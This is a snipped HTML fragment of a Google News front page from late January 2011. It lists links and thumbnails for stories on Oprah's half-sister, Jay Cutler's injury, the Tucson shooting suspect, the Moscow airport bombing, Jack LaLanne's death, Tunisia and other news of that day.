...[SNIP]...
</div> <img class="chip nav-b" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-t" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-e" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-s" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-m" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.cbc.ca/arts/tv/story/2011/01/24/oprah-reunion.html" class="usg-AFQjCNFDR0QmOX6C-l_v50vKksPPaKSEzA " title="CBC.ca"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/qMklKOy43j6_5M/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.cbc.ca/arts/tv/story/2011/01/24/oprah-reunion.html" class="usg-AFQjCNFDR0QmOX6C-l_v50vKksPPaKSEzA "> CBC.ca </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNEhLfkwP3KHv_AxKWphB2eFXVLo4w " href="http://www.people.com/people/article/0,,20460315,00.html" id="MAA4AEgDUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=1wbQ-zmLKqg">Video: 
Oprah Reveals Her Big Family Secret
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.businessinsider.com/wow-how-oprahs-half-sister-discovered-they-were-related-2011-1" target="_blank" class="usg-AFQjCNHu4Y7lCPXQJ2lc2u8sbaHH6Tfs7w " id="MAA4AEgDUAFgAmoCdXM">WATCH: Oprah Meets Her Secret Half-Sister</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFIUkZzAs9Y61wWQ3duZpRqiJx8Gg " href="http://popwatch.ew.com/2011/01/24/oprah-half-sister-family-secret/" id="MAA4AEgDUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF4hVZx0KyfMaR7DUadFRt5fLq5aA " href="http://theweek.com/article/index/211389/oprahs-half-sister-revelation-a-publicity-stunt" id="MAA4AEgDUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNE8lkOCVmQaNBIQdhaM5ui-PusAEw " href="http://www.longislandpress.com/2011/01/24/oprahs-sister-oprahs-half-sister/" id="MAA4AEgDUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFXXoTIObmZKgwDKkelX1OPlkq3eQ " href="http://www.thirdage.com/news/vernita-lee-oprahs-mom-couldnt-afford-raise-another-daughter_1-24-2011" id="MAA4AEgDUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.cbc.ca/sports/football/story/2011/01/24/sp-cutler-sprained-mcl.html" class="usg-AFQjCNHO68tPIt-RIKvL2eDyHIRPQpqkXA " title="CBC.ca"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/7106jCsR-SIHYM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.cbc.ca/sports/football/story/2011/01/24/sp-cutler-sprained-mcl.html" class="usg-AFQjCNHO68tPIt-RIKvL2eDyHIRPQpqkXA "> CBC.ca </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNExCKBurSTO2CpunscBMXRB8AS8rg " href="http://sportsillustrated.cnn.com/2011/writers/paul_daugherty/01/24/jay.cutler/" id="MAA4AEgEUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://sports.espn.go.com/chicago/nfl/news/story?id=6054809" target="_blank" class="usg-AFQjCNGOcyfxN0x_yhl1C7G2kN9X2Uvebw " id="MAA4AEgEUAFgAmoCdXM">A closer look at Jay Cutler's knee injury</a>
...[SNIP]...
<div class="aa-inner"><a href="http://content.usatoday.com/communities/campusrivalry/post/2011/01/dukes-coach-k-says-chicago-bears-qb-jay-cutler-should-support-team/1" target="_blank" class="usg-AFQjCNHjzljR480WHVLDV2GFli4gPC1ywg " id="MAA4AEgEUAJgAmoCdXM">Duke's Coach K says Chicago Bears QB Jay Cutler should support team</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGk8jkGEv1Mwau1rxJflyTxLLTyLQ " href="http://www.chicagobreakingsports.com/2011/01/bears-cutler-suffers-sprain-of-mcl-in-left-knee.html" id="MAA4AEgEUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGhT_d3vHMRaBJkdkY1C3b7vZZrJg " href="http://profootballtalk.nbcsports.com/2011/01/24/final-cutler-injury-update-grade-ii-mcl-tear/" id="MAA4AEgEUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGamyU16jAdCMJDs5ZkpwKdiXpkGw " href="http://nbcsports.msnbc.com/id/41239129/ns/sports-player_news/" id="MAA4AEgEUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG2WdPyyjmLcRZK_1AY0NI8Eu5RwA " href="http://www.chicagobreakingsports.com/2011/01/bears-teammates-rally-behind-besieged-cutler.html" id="MAA4AEgEUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.theglobeandmail.com/news/world/suspect-pleads-not-guilty-in-shooting-of-arizona-politician/article1881169/" class="usg-AFQjCNFHrm3_Wc9W5EPT2lfuU9wPIFUlZg " title="Globe and Mail"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/n7jseiULnXrLMM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.theglobeandmail.com/news/world/suspect-pleads-not-guilty-in-shooting-of-arizona-politician/article1881169/" class="usg-AFQjCNFHrm3_Wc9W5EPT2lfuU9wPIFUlZg "> Globe and M... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHBvFgzzTzx9w0WGdmzzseti6ngaQ " href="http://www.reuters.com/article/idUSTRE70N6U520110124" id="MAA4AEgFUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://feeds.nytimes.com/click.phdo?i=1134bc987ca2a36b4b35055e16a29639" target="_blank" class="usg-AFQjCNHRBBkahFzpw1JR8NdswhIZNcjYIw " id="MAA4AEgFUAFgAmoCdXM">Suspect Pleads Not Guilty in Tucson Shooting</a>
...[SNIP]...
<div class="aa-inner"><a href="http://abcnews.go.com/US/jared-loughner-accused-tucson-shooter-smiles-court-appearance/story?id=12750000" target="_blank" class="usg-AFQjCNHFSESne1W6NZKJuevUCkqaTiP9mg " id="MAA4AEgFUAJgAmoCdXM">Accused Tucson Gunman Jared Loughner Smiles Through Hearing</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNElebFTmOpQ7wKik8gpIXpP1selVQ " href="http://www.9and10news.com/Category/Story/?id=279641&cID=3" id="MAA4AEgFUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEOK7cyGOy-zN-41xid_LtEjydG4Q " href="http://www.businessweek.com/news/2011-01-24/loughner-pleads-not-guilty-to-attempted-murder-charges.html" id="MAA4AEgFUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEJgwhPmG1bymLrGfBOg1B6uj9lxA " href="http://content.usatoday.com/communities/ondeadline/post/2011/01/tucson-shooting-suspect-loughner-to-be-arraigned-shortly/1" id="MAA4AEgFUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFSXfhjHN0rS0rdJf8PBDheYe6-rQ " href="http://mystateline.com/fulltext-news/?nxd_id=223216" id="MAA4AEgFUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.guardian.co.uk/world/2011/jan/24/domodedovo-airport-bomb-security" class="usg-AFQjCNGVDGLOLsIm_GbjonYy-EjwCNixSQ " title="The Guardian"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/sF9Yx43EuUfcmM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.guardian.co.uk/world/2011/jan/24/domodedovo-airport-bomb-security" class="usg-AFQjCNGVDGLOLsIm_GbjonYy-EjwCNixSQ "> The Guardia... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHSXYfXliztkaNWmpZ7jjwek16gxA " href="http://en.rian.ru/russia/20110125/162282705.html" id="MAA4AEgGUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=90gldve1V1g">Video: 
Medvedev delays Davos trip over 'barbaric' Domodedovo tragedy
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.reuters.com/article/idUS198178545820110124" target="_blank" class="usg-AFQjCNGSAB-m5iwTzxGnMuGS88QYOM7ySw " id="MAA4AEgGUAFgAmoCdXM">Breaking News: At Least 35 Dead, 150 Injured in Moscow Airport Explosion</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHWvc5HbfGnAvgPIeDY6BBRSXxwug " href="http://www.voanews.com/english/news/Blast-Kills-At-Least-10-at-Moscow-Airport-114481529.html" id="MAA4AEgGUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHA0iKAZItKHA9EroIoCjTNS4ph1A " href="http://www.msnbc.msn.com/id/41238598/ns/world_news-europe/" id="MAA4AEgGUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFNSZmNow3mU5fl-5uIhKylIg8xhw " href="http://content.usatoday.com/communities/ondeadline/post/2011/01/bbc-at-least-10-killed-in-explosion-at-moscow-airport/1?csp=hf" id="MAA4AEgGUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG86xUGIkzfiauYZ7t_EAM4mQLkiA " href="http://www.guardian.co.uk/world/2011/jan/24/moscow-airport-bomb-kills-dozens" id="MAA4AEgGUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.foxnews.com/entertainment/2011/01/24/biggest-fitness-guru-time/" class="usg-AFQjCNG2OtWhDeooSC6nGZ0XSwCL8YlTOA " title="Fox News"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/4MailUtGZpNvBM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.foxnews.com/entertainment/2011/01/24/biggest-fitness-guru-time/" class="usg-AFQjCNG2OtWhDeooSC6nGZ0XSwCL8YlTOA "> Fox News </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHGP9SsjzyW62sRmc_IObJzTshL0g " href="http://www.mercurynews.com/breaking-news/ci_17184991" id="MAA4AEgHUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=uwXNpYAgahg">Video: 
Fitness Guru Jack LaLanne Dead at 96
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.latimes.com/news/obituaries/la-me-jack-lalanne-20110124,0,6764075.story" target="_blank" class="usg-AFQjCNF2h3Ezfm1HF14DqaqR8JY12OIJCg " id="MAA4AEgHUAFgAmoCdXM">Jack LaLanne dies at 96; spiritual father of US fitness movement</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG2OtWhDeooSC6nGZ0XSwCL8YlTOA " href="http://www.foxnews.com/entertainment/2011/01/24/biggest-fitness-guru-time/" id="MAA4AEgHUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHCUvbbz0ZsETsJAmVKDjwuHSZcMQ " href="http://www.usatoday.com/yourlife/fitness/exercise/2011-01-25-lalanneobit24_ST_N.htm?csp=ylf" id="MAA4AEgHUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFY9XEVCdovnm3JUC4ZmzWPDVoZqw " href="http://www.catholic.org/ae/celebrity/story.php?id=40071" id="MAA4AEgHUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEUK_ckNba_6O2oIdCyiO_TLZwXwQ " href="http://www.ksby.com/news/locals-work-out-in-honor-of-the-late-fitness-guru-jack-lalanne" id="MAA4AEgHUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.ctv.ca/CTVNews/TopStories/20110122/tunisia-montreal-110122/" class="usg-AFQjCNGCYpC-tROn3xPDxxA2H_u5qL69NQ " title="CTV.ca"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/z55aFPv78aqfWM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.ctv.ca/CTVNews/TopStories/20110122/tunisia-montreal-110122/" class="usg-AFQjCNGCYpC-tROn3xPDxxA2H_u5qL69NQ "> CTV.ca </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGf__nmauUuSabbP9kk2SvRT05zrg " href="http://online.wsj.com/article/SB10001424052748704279704576102300534990160.html?mod=googlenews_wsj" id="MAA4AEgIUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://feeds.nytimes.com/click.phdo?i=7700bb1615b746aacc097462c73508b7" target="_blank" class="usg-AFQjCNHXjZjZZ9wZ1CQDlom-nLlng-eGZQ " id="MAA4AEgIUAFgAmoCdXM">Army Leader Guarantees Stability in Tunisia</a>
...[SNIP]...
<div class="aa-inner"><a href="http://edition.cnn.com/2011/WORLD/americas/01/24/tunisia.canada.ben.ali/" target="_blank" class="usg-AFQjCNHRMMEdervYw4C3TrR4yaH527g-LA " id="MAA4AEgIUAJgAmoCdXM">Family of deposed Tunisian president reportedly flees to Canada</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGfbz26qP-4kIHs7Cs4zetWEFMGQg " href="http://www.reuters.com/article/idUSTRE70N4AE20110124" id="MAA4AEgIUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFd1p9S1P917IJX6_NsO7fub3yJQg " href="http://allafrica.com/stories/201101242014.html" id="MAA4AEgIUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHBQ6i08N55rvq2OZdEmGRrU9lJbg " href="http://www.csmonitor.com/World/Middle-East/2011/0124/Tunisia-s-opposition-defends-unity-government-as-pressure-mounts" id="MAA4AEgIUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEIRtGWiZ24XajWlPE7P_ytLx4u3w " href="http://english.aljazeera.net/news/africa/2011/01/2011124163051778391.html" id="MAA4AEgIUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.zeenews.com/news682964.html" class="usg-AFQjCNGjuhLYOwwQDWERwWa00agiriIpeA " title="Zee News"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/-ZSVDVOrR4x4PM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.zeenews.com/news682964.html" class="usg-AFQjCNGjuhLYOwwQDWERwWa00agiriIpeA "> Zee News </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGE1VkAeO99EDIU5V2VTdJDt90ETw " href="http://arstechnica.com/web/news/2011/01/mozilla-google-take-different-approaches-to-user-tracking-opt-out.ars" id="MAA4AEgJUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.pcmag.com/article2/0,2817,2376185,00.asp" target="_blank" class="usg-AFQjCNGZP7c0Zl6lnVgm4bMy_QmQ4_9spA " id="MAA4AEgJUAJgAmoCdXM">Tracking Should Be Abolished</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGMvJiGe2AX0noQzS6SakNvosEsRw " href="http://www.technewsworld.com/story/Firefox-Do-Not-Track-Feature-Seen-as-Toothless-71710.html" id="MAA4AEgJUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNH2Ail2CEz7JI11eKLrtWgI-nzRPQ " href="http://www.pcworld.com/businesscenter/article/217478/firefox_donottrack_feature_has_a_fatal_flaw.html" id="MAA4AEgJUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFCTq4wbQgxveQv_898rJ_IkIIXwg " href="http://www.tgdaily.com/software-features/53720-how-to-opt-out-with-googles-chrome-browser" id="MAA4AEgJUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.bizjournals.com/stlouis/news/2011/01/24/creve-coeur-to-lose-smurfit-stone-hq.html" class="usg-AFQjCNFlkgnxLOGOIFyBSsT-ZZz8lmH1PA " title="Bizjournals.com"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/g54p1BDYwrB4oM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.bizjournals.com/stlouis/news/2011/01/24/creve-coeur-to-lose-smurfit-stone-hq.html" class="usg-AFQjCNFlkgnxLOGOIFyBSsT-ZZz8lmH1PA "> Bizjournals... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFJ_Gs52Mso4Rmc8202BGU0W2_L6Q " href="http://www.reuters.com/article/idUSTRE70N6Q420110124" id="MAA4AEgKUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://online.wsj.com/article/SB10001424052748703555804576102341574484526.html?mod=googlenews_wsj" target="_blank" class="usg-AFQjCNHfGkJgRqTwQFW4jGNECzdb_053bw " id="MAA4AEgKUAFgAmoCdXM">Smurfit Options Trades Raise Analyst Brows</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.thestreet.com/story/10982553/1/tax-preparation-halliburton-hot-trends.html?cm_ven=GOOGLEN" target="_blank" class="usg-AFQjCNEjjwBXv_sJbLEN9ftV5HG1BzLX7g " id="MAA4AEgKUAJgAmoCdXM">McRib, Smurfit-Stone: Hot Trends</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF7GHQ7EiaH4U94pZ0LQb_hOwaJjA " href="http://www.marketwatch.com/story/rocktenn-to-buy-smurfit-stone-for-35-billion-2011-01-24" id="MAA4AEgKUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF8KU8lwacw5bgjcA_PplD4ky7CcA " href="http://www.missourinet.com/2011/01/24/st-louis-based-smurfit-stone-sells-for-3-5b/" id="MAA4AEgKUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEoA064sb9NXd1pqBHc47dzM2oIJw " href="http://www.thirdage.com/news/rock-tenn-buys-smurfit-stone-35-billion_1-24-2011" id="MAA4AEgKUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.reuters.com/article/idUSTRE70N5ZW20110124" class="usg-AFQjCNH7STnOQPGVSySyMeBzJftacyPLLg " title="Reuters"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/0fcME5GA0IOcZM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.reuters.com/article/idUSTRE70N5ZW20110124" class="usg-AFQjCNH7STnOQPGVSySyMeBzJftacyPLLg "> Reuters </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNElKv0GNcBZgzUQCULJE3OQ6oz6jw " href="http://online.wsj.com/article/SB10001424052748704279704576102242255911216.html?mod=googlenews_wsj" id="MAA4AEgLUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=Id_W6wgEIGo">Video: 
Palestine Papers spark fury in Ramallah
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.guardian.co.uk/world/2011/jan/24/papers-palestinian-leaders-refugees-fight" target="_blank" class="usg-AFQjCNGGya3F-AttIyCGzX9tofIwFV9hxA " id="MAA4AEgLUAFgAmoCdXM">Papers reveal how Palestinian leaders gave up fight over refugees</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEaadv9eEgCosx3Fx9YrK8VmjQUUA " href="http://www.jpost.com/MiddleEast/Article.aspx?id=205065" id="MAA4AEgLUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNECRhzSqEJbRN9fKfxZ08aW9SDk8A " href="http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12270504" id="MAA4AEgLUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHoZJ4kqbRh3uXH99xaN2e36i18eg " href="http://english.aljazeera.net/palestinepapers/2011/01/201112412224387862.html" id="MAA4AEgLUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEV93objFvHJXFeDa0meWiOJcehyw " href="http://www.dailytimes.com.pk/default.asp?page=2011%5C01%5C25%5Cstory_25-1-2011_pg4_1" id="MAA4AEgLUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.foxnews.com/health/2011/01/24/report-heart-disease-costs-triple/" class="usg-AFQjCNEABo5vi1V46W0WvRcqWvag9t1vuw " title="Fox News"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/mwTGtKZ4NInPwM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.foxnews.com/health/2011/01/24/report-heart-disease-costs-triple/" class="usg-AFQjCNEABo5vi1V46W0WvRcqWvag9t1vuw "> Fox News </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFDfn7oAgiO1bwSefFQwDxUfjYx7w " href="http://www.webmd.com/heart-disease/news/20110123/heart-disease-treatment-costs-may-triple-in-next-20-years" id="MAA4AEgMUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://health.usnews.com/health-news/family-health/heart/articles/2011/01/24/lowering-bp-can-help-cut-womens-heart-disease-risk.html" target="_blank" class="usg-AFQjCNGMewBDUXKRrXbz9dDPgk2CfatYqg " id="MAA4AEgMUAFgAmoCdXM">Lowering BP Can Help Cut Women's Heart Disease Risk</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.businessweek.com/lifestyle/content/healthday/649165.html" target="_blank" class="usg-AFQjCNFTF19UjawTG0U74K1vgENiWJteKg " id="MAA4AEgMUAJgAmoCdXM">U.S. Heart Disease Costs Expected to Soar</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG3XToTSrtKhlkI7xZ-Y6ypAF1H4g " href="http://www.msnbc.msn.com/id/41234780/ns/health-heart_health/" id="MAA4AEgMUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEShwCjRPP3o8B9Bknfl-uNzkHnTg " href="http://www.bloomberg.com/news/2011-01-24/heart-disease-treatment-cost-to-triple-to-818-billion-by-2030-group-says.html" id="MAA4AEgMUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGcfD1knVticOCLd49-9hkVxr9FiA " href="http://ozarksfirst.com/fulltext?nxd_id=391716" id="MAA4AEgMUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHbJTmNGEga0s_5dekJF3wI_kJcFw " href="http://www.prnewswire.com/news-releases/american-heart-association-rapid-access-journal-report-lowering-blood-pressure-in-middle-aged-women-reduces-heart-disease-risk-114504829.html" id="MAA4AEgMUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.theglobeandmail.com/sports/football/tom-brady-a-unanimous-ap-all-pro/article1881082/" class="usg-AFQjCNEysYm69ZDXP4EpTrC80dSrklUIwA " title="Globe and Mail"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/8VFR3JrwXIVmeM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.theglobeandmail.com/sports/football/tom-brady-a-unanimous-ap-all-pro/article1881082/" class="usg-AFQjCNEysYm69ZDXP4EpTrC80dSrklUIwA "> Globe and M... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNEceaM8GMTGP7YZHD2H7DN0PklU7g " href="http://www.bostonherald.com/sports/football/patriots/view.bg?articleid=1311662&srvc=rss" id="MAA4AEgNUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://espn.go.com/blog/boston/new-england-patriots/post?id=4692316" target="_blank" class="usg-AFQjCNFXDwzIsfpbYW4xLUwi4UyNPddplA " id="MAA4AEgNUAFgAmoCdXM">Brady unanimous choice as AP All-Pro</a>
...[SNIP]...
<div class="aa-inner"><a href="http://musketfire.com/2011/01/24/three-patriots-make-the-all-pro-team/" target="_blank" class="usg-AFQjCNGS3y2ZauZ7IEGNf6kOGpRFYvxByw " id="MAA4AEgNUAJgAmoCdXM">Three Patriots Make the All-Pro Team</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFtVmCzgJetNQA3YuO6D6T2xCsrGQ " href="http://www.boston.com/sports/football/patriots/extra_points/2011/01/tom_brady_unani.html" id="MAA4AEgNUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGDZvJMjOxvPGWf0GTtpiYowmX3nw " href="http://itiswhatitis.weei.com/sports/newengland/football/patriots/2011/01/24/brady-mayo-mankins-named-all-pro/" id="MAA4AEgNUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHvwv1Cu4OL92x3XwJPQZYjdPrTWQ " href="http://www.rotoworld.com/content/playerpages/playerbreakingnews.asp?sport=NFL&id=1163&line=199317&spln=1" id="MAA4AEgNUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://calgary.ctv.ca/servlet/an/local/CTVNews/20110123/detroit-shooting-110123/20110123/?hub=CalgaryHome" class="usg-AFQjCNE0eNokzF4QIbj8Or-8ZrIrj02jXA " title="CTV.ca"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/CM5pzdorOgaBrM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://calgary.ctv.ca/servlet/an/local/CTVNews/20110123/detroit-shooting-110123/20110123/?hub=CalgaryHome" class="usg-AFQjCNE0eNokzF4QIbj8Or-8ZrIrj02jXA "> CTV.ca </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHS5uJx4olbyF9osDF3gTDGuyuCPg " href="http://www.usatoday.com/news/nation/2011-01-24-detroit-shooting_N.htm" id="MAA4AEgOUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=3i4eR4POFOw">Video: 
Detroit rape suspect to be arraigned on several assault counts.
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.detnews.com/article/20110124/METRO01/101240374/1409/metro/Detroit-rape-suspect--31--has-spent-almost-half-his-life-in-prison" target="_blank" class="usg-AFQjCNHDjiKWPniNGy7SY6MsW0KH4Ih34Q " id="MAA4AEgOUAFgAmoCdXM">Detroit rape suspect, 31, has spent almost half his life in prison</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEalDUBH8-HQVONhcKZ4MW2d5rlSw " href="http://www.freep.com/article/20110124/NEWS05/101240382/1007/news05/4-officers-shot-gunman-dead-in-horrifying-attack" id="MAA4AEgOUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHCCEQVPyyjZin-IgS-GZbKQg96lw " href="http://www.cnn.com/2011/CRIME/01/24/michigan.rape.suspect/?hpt=T2" id="MAA4AEgOUANgCGoCdXM"><span class="titletext">
...[SNIP]...
